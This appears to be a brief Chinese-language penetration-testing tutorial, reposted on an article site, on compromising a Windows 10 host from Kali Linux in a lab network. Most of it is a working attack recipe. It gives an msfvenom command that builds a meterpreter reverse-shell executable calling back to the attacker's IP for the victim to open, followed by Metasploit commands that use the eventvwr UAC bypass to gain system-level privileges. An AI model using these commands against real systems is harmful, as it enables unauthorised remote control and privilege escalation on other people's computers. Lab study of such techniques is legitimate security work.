編碼的世界 / 優質文選 / 財富

Kali Linux滲透測試--windows 10入侵和提權過程


2022年7月16日
-   

在進行入侵檢測之前,配置好網絡環境,使其相互連通,才能進行入侵。在使用Metasploit成功入侵之後拿到的只是一個基礎的shell,要想拿到系統級別的shell,添加系統用戶,獲取用戶登錄口令,還需要進一步提權。 一、Metasploit對windows 10入侵測試 環境 攻擊機:Kali Linux 2019                ip:192.168.5.11 目標主機:Windows 10                 ip:192.168.2.104 1.1生成exe文件,並在目標主機打開
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.11 LPORT=1000 -f exe -o met.exe

1.2.設置payload,設置本地IP和監聽端口 二、輸入background隱藏此界面,然後進一步提權
msf5> use exploit/windows/local/bypassuac_eventvwr
msf5 exploit(bypassuac) > set session 3
msf5 exploit(bypassuac) > exploit
然會生成另一個session,可以進行提權操作了,提權過程中並不需要設置端口號了,默認4444即可


2.2.獲得shell之後,敲入dir命令亂碼顯示,只要輸入chcp 65001,即可解決

熱門文章